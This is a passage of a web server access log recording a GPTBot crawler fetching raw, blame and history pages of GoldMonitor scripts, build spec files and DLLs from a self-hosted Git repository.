(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 11793] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18409] [Gzip 9.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 10828] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" +[17/Feb/2026:14:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10370] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" +[17/Feb/2026:14:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12626] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21315] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:14:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18409] [Gzip 9.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 312479] [Gzip 21.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 11793] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 22872] [Gzip 11.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12625] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12397] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20872] [Gzip 10.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20839] [Gzip 10.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19036] [Gzip 9.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 20870] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10393] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" +[17/Feb/2026:14:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 22910] [Gzip 11.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11573] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19390] [Gzip 6.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12358] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22304] [Gzip 11.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20789] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 17968] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12522] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 